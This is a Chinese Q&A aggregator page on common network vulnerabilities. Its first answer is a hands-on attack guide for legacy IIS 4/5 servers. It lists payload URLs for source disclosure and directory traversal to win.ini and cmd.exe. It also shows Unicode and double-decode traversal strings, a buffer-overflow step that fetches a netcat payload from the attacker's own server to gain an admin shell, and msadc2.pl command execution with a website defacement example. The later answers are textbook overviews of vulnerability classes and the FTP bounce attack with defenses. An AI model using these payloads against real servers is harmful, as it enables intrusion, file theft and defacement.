導航:首頁 > 編程大全 > 常見網路安全漏洞

常見網路安全漏洞

發布時間:2024-04-01 03:47:10

1. 常見的網路漏洞有哪些

你說的漏洞比較廣,是軟體漏洞還是系統 系統漏洞還有server漏洞還有iis漏洞 我就和你說說iis漏洞吧。1. iis4hack緩沖溢出
主要存在於.htr,.idc和.stm文件中,其對關於這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些後門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一台自己的WEB伺服器。你現在你自己的WEB伺服器上運行WEB服務程序並把ncx.exe放到你自己相應的目錄下,然後使用iishack.exe來檢查目標機器:

c:>iishack.exe <victim> 80 <your web server>/ncx.exe

然後你就使用netcat來連接你要檢測的伺服器:

c:>nc <victim> 80
如果溢出點正確你就可以看到目標機器的命令行提示,並且是管理遠許可權。利用程序見iis4hack.zip

2.msadc
IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在於RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS伺服器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = mp Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h http://www.targe.com/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出現cmd /c後,直接鍵入命令行,就可以以system許可權執行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp
察看文件源代碼
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp
察看文件源代碼
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw
察看文件源代碼
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變數CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件並返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從伺服器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消
這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)
一個攻擊者可以使用如下的方法來訪問系統中文件的內容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

8.ASP Dot Bug
在請求的URL結尾追加一個或者多個點導致泄露ASP源代碼。
http://www.victim.com/sample.asp.

9.ISM.DLL
這個漏洞是由Cerberus Information Security team.最早發現的,它運行在IIS4.0和5.0上面,允許攻擊者查看任意文件內容和源代碼。通過在文件名後面追加近230個+或者?%20?(這些表示空格)並追加?.htr?的特殊請求給IIS,會使IIS認為客戶端請求的是?.htr?文件,而.htr文件的後綴映射到ISM.DLL ISAPI應用程序,這樣IIS就把這個.htr請求轉交給這個DLL文件,然後ISM.DLL 程序把傳遞過來的文件打開和執行,但在ISM.DLL 截斷信息之前,緩沖區發送 一個截斷開的 .Htr 並會有一些時間去返回一些你要打開的文件內容. 除非 WEB 服務停止並重啟過,否則這攻擊只能有效執行一次。如果已經發送過一個 .htr 請求到機器上,那麼這攻擊會失效.它只能在 ISM.DLL第一次裝入內存時工作.CNNS發現追加+號到沒有一次攻擊這個問題,可以進行多次攻擊。

http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr

10. .idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪的說有些還在IIS5.0上發現過此類漏洞,通過增加?idc?或者?ida? 後綴到URL會導致IIS嘗試允許通過資料庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.victim.com/anything.idc 或者 anything.idq

11.+.htr Bug
對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的泄露:
http://www.victim.com/global.asa+.htr

12.NT Site Server Adsamples
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者 可能獲得一些如資料庫中的DSN,UID和PASS的一些信息,如:

http://www.victim.com/adsamples/config/site.csc

13./iisadmpwd
IIS4.0中包含一個有趣的特徵就是允許遠程用戶攻擊WEB伺服器上的用戶帳號,就是你的WEB伺服器是通過NAT來轉換地址的,還可以被攻擊。 每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個 .htr文件,匿名用戶允許訪問這些文件,這些文件剛好沒有規定只限制 在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳號和密碼。這個目錄物理映射在下面的目錄下:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
這樣,攻擊者可以通過暴力來猜測你的密碼。

14.Translate:f Bug
泄露asp文件源代碼 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 當有人請求一個ASP/ASA後者其他任意腳本的時候在HTTP GET加上Translate:f 後綴,並在請求文件後面加/就會顯示文件代碼,當然在沒有打WIN2K SP1補丁 為前提。這個是W2K的漏洞,但由於FP2000也安裝在IIS4.0上,所以在IIS4.0上也有這個漏洞。利用程序: trasn1.pl,trans2.pl

15.Unicode
IIS 4.0和IIS 5.0在Unicode字元解碼的實現中存在一個安全漏洞,導致用戶可以遠程通過IIS執行任意命令。當IIS打開文件時,如果該文件名包含unicode字元,它會對其進行解碼,如果用戶提供一些特殊 的編碼,將導致IIS錯誤的打開或者執行某些web根目錄以外的文件。

http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

可能需要察看以下幾個目錄
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
eeye開發了工具包iishack1.5針對這一漏洞進行測試
16.iis5.0 緩沖溢出
微軟Win 2K IIS
5的列印ISAPI擴展介面建立了.printer擴展名到msw3prt.dll的映射關系,預設情況下該映射存在。當遠程用戶提交對.printer的URL請求時,IIS
5調用msw3prt.dll解釋該請求。由於msw3prt.dll缺乏足夠的緩沖區邊界檢查,遠程用戶可以提交一個精心構造的針對.printer的URL請求,其"Host:"域包含大約420位元組的數據,此時在msw3prt.dll中發生典型的緩沖區溢出,潛在允許執行任意代碼。溢出發生後,WEB服務停止響應,Win 2K可以檢查到WEB服務停止響應,從而自動重啟它,因此系統管理員很難意識到發生過攻擊。利用程序見iis5hack.zip

17.IIS CGI文件名二次解碼漏洞
IIS在載入可執行CGI程序時,會進行兩次解碼。第一次解碼是對CGI文件名進行http解碼,然後判斷此文件名是否為可執行文件,例如檢查後綴名是否為".exe"或".com"等等。在文件名檢查通過之後,IIS會再進行第二次解碼。正常情況下,應該只對該CGI的參數進行解碼,然而,IIS錯誤地將已經解碼過的CGI文件名和CGI參數一起進行解碼。這樣,CGI文件名就被錯誤地解碼了兩次。
通過精心構造CGI文件名,攻擊者可以繞過IIS對文件名所作的安全檢查,例如對"../"或"./"的檢查,在某些條件下,攻擊者可以執行任意系統命令。

例如,對於』』這個字元,正常編碼後是%5c。這三個字元對應的編碼為:
』%』 = %25
』5』 = %35
』c』 = %63
如果要對這三個字元再做一次編碼,就可以有多種形式,例如:
%255c
%%35c
%%35%63
%25%35%63
...
因此,".."就可以表示成"..%255c"或"..%%35c"等等形式。在經過第一次解碼之後,變成"..%5c"。IIS會認為這是一個正常的字元串,不會違反安全規則檢查。而在第二次被解碼之後,就會變成".."。因此攻擊者就可以使用".."來進行目錄遍歷,執行web目錄之外的任意程序。 好了 先到這里。。。。漏洞太多了不過還是微軟系統排第一的 一個是使用的人群廣 一個是XXX 哈哈哈

2. 網路安全漏洞含義

來源:趨勢科技認證信息安全專員(TCSP)教材
網路安全漏洞主要表現在以下幾個方面:
a. 系統存在安全方面的脆弱性:現在的操作系統都存在種種安全隱患,從Unix到Windows,五一例外。每一種操作系統都存在已被發現的和潛在的各種安全漏洞。
b. 非法用戶得以獲得訪問權。
c. 合法用戶未經授權提高訪問許可權。
d. 系統易受來自各方面的攻擊。
漏洞分類
常見的漏洞主要有以下幾類:
a. 網路協議的安全漏洞。
b. 操作系統的安全漏洞。
c. 用用程序的安全漏洞。
漏洞等級
按對目標主機的危害程度,漏洞可分為:
a. A級漏洞:允許惡意入侵者訪問並可能會破壞整個目標系統的漏洞
b. B級漏洞:允許本地用戶提高訪問許可權,並可能使其獲得系統控制的漏洞
c. C級漏洞:允許用戶終端、降低或阻礙系統操作的漏洞
安全漏洞產生的原因
安全漏洞產生的原因很多,主要有以下幾點:
a. 系統和軟體的設計存在缺陷,通信協議不完備。如TCP/CP協議既有很多漏洞。
b. 技術實現不充分。如很多緩存一處方面的漏洞就是在實現時缺少必要的檢查。
c. 配置管理和使用不當也能產生安全漏洞。如口令過於簡單,很容易被黑客猜中。
Internet服務的安全漏洞
網路應用服務,指的事在網路上所開放的一些服務,通常能見到如WEB、MAIL、FTP、DNS、TESLNET等。當然,也有一些非通用的服務,如在某些領域、行業中自主開發的網路應用程序。常見的Internet服務中都存在這樣那樣的安全漏洞。比如:
a. 電子郵件中的:冒名的郵件:匿名信:大量湧入的信件。
b. FTP中的:病毒威脅;地下站點。
FTP安全性分析
文件傳輸協議(File Transfer Protocol,FTP)是一個被廣泛應用的協議,它使得我們能夠在網路上方便地傳輸文件。早期FTP並沒有設計安全問題,隨著互聯網應用的快速增長,人們對安全的要求也不斷提高。
早期對FTP的定義指出,FTP是一個ARPA計算機網路上主機間文件傳輸的用戶級協議。其主要功能是方便主機間的文件傳輸,並且允許在其他主機上方便的進行存儲和文件處理;而現在FTP的應用范圍則是Internet。根據FTP STD 9定義,FTP的目標包括:
a.促進文件(程序或數據)的共享。
b.支持間接或隱式地試用遠程計算機。
c.幫助用戶避開主機上不同的協議和防火牆。
d.可靠並有效地傳輸數據。
關於FTP的一些其他性質包括:FTP可以被用戶在終端使用,但通常是給程序試用的。FTP中主要採用了傳輸控制協議(Transmission Control Protocol,TCP),以及Telnet協議。
防範反彈攻擊(The Bounce Attack)
1.漏洞
FTP規范[PR85]定義了「代理FTP」機制,即伺服器間交互模型。支持客戶建立一個FTP控制連接,然後在兩個伺服器間傳送文件,同時FTP規范中對試用TCPd埠號沒有任何限制,從0~1023的TCP埠號保留用於各種各樣的網路服務。所以,通過「代理FTP」,客戶可以名利FTP伺服器攻擊任何一台機器上的網路服務。
2.反彈攻擊
客戶發送一個包含被攻擊的機器和服務的網路地址和埠號的FTP「POST」命令。這時客戶要求FTP伺服器向被攻擊的伺服器發送一個文件,該文件應包含與被攻擊的服務相關的命令(如SMTP,NNTP)。由於是命令第三方去連接服務,而不是直接連接,這樣不僅使追蹤攻擊者變得困難,還能避開給予網路地址的訪問限制。
3.防範措施
最簡單的辦法就是封住漏洞。首先,伺服器最好不要建立TCP埠號在1024以下的連接。如果伺服器收到一個包含TCP埠號在1024以下的POST命令,伺服器可以返回消息504中定義為「對這種參數命令不能實現」)。其次,禁止試用POST命令,也是一個可選的防範反彈攻擊的方案。大多數的文件傳輸只需要PASV命令。這樣做的缺點事失去了試用「代理FTP」的可能性,但是在某些環境中並不需要「代理FTP」。
4.遺留問題
僅僅是控制1024以下的連接,仍會使用戶定義的服務(TCP埠號在1024以上)遭受反彈攻擊。
未完,待續……

3. web安全漏洞有哪些

web常見的幾個漏洞復
1. SQL注入。SQL注入攻擊制是黑客對資料庫進行攻擊的常用手段之一。
2. XSS跨站點腳本。XSS是一種經常出現在web應用中的計算機安全漏洞,它允許惡意web用戶將代碼植入到提供給其它用戶使用的頁面中。
3. 緩沖區溢出。緩沖區溢出漏洞是指在程序試圖將數據放到及其內存中的某一個位置的時候,因為沒有足夠的空間就會發生緩沖區溢出的現象。
4. cookies修改。即使 Cookie 被竊取,卻因 Cookie 被隨機更新,且內容無規律性,攻擊者無法加以利用。另外利用了時間戳另一大好處就是防止 Cookie 篡改或重放。
5. 上傳漏洞。這個漏洞在DVBBS6.0時代被黑客們利用的最為猖獗,利用上傳漏洞可以直接得到WEBSHELL,危害等級超級高,現在的入侵中上傳漏洞也是常見的漏洞。
6. 命令行輸入。就是webshell ,拿到了許可權的黑客可以肆意妄為。

4. 常見的網路安全漏洞有哪些

GUEST用戶,系統默認的隱藏共享,OFFICE的安全性級別,OUTLOOK軟體,這些應該都算吧。

閱讀全文

與常見網路安全漏洞相關的資料

熱點內容
mstcam數控銑床編程如何串連 瀏覽:502
d4252用什麼軟體編程 瀏覽:35
大學生如何參與大數據 瀏覽:779
autocad3維教程 瀏覽:2
港澳台版本有什麼區別 瀏覽:263
java四個月能學到什麼 瀏覽:46
開發板和linux文件 瀏覽:202
appstore外國帳號怎麼看預約游戲 瀏覽:137
有什麼免費加速網站的cdn 瀏覽:781
哪個文件存在最安全 瀏覽:199
淘寶導航欄分割線代碼 瀏覽:271
win10開不了機按f8沒用 瀏覽:12
河南營銷網站推廣多少錢 瀏覽:135
華為暢享6手機文件管理 瀏覽:939
linux驅動環境 瀏覽:893
ae用什麼打開文件 瀏覽:877
湖南嶽陽大數據中心 瀏覽:710
DSP大數據公司 瀏覽:510
win10檢測不到u盤啟動 瀏覽:941
電腦文件怎麼重命名文件 瀏覽:507

友情鏈接